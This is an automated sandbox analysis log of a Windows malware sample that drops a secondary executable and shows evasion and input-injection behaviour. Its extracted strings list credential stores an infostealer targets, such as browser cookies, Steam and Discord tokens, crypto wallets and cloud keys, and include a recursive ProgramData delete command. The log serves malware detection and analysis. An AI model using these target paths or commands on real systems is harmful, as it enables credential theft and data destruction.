Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6980 --field-trial-handle=1936,i,7964598292431625075,12103028554522490085,262144 /prefetch:8
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Google Drive.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.19.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 25xTHcaF7V.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: Surrey.com, 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: cryptosetup.pdbGCTL source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: cryptosetup.pdb source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: 1.pdb\ source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 1.pdb source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: {"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWAR
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: 25xTHcaF7V.exe Static PE information: real checksum: 0xd7c72 should be: 0xde362
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00960DE6 push ecx; ret 13_2_00960DF9

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com File created: C:\ProgramData\9r1vs\i5pz5p Jump to dropped file

Boot Survival

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 13_2_009D26DD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 13_2_0095FC7C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Dropped PE file which has not been started: C:\ProgramData\9r1vs\i5pz5p Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com API coverage: 3.7 %
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009ADC54
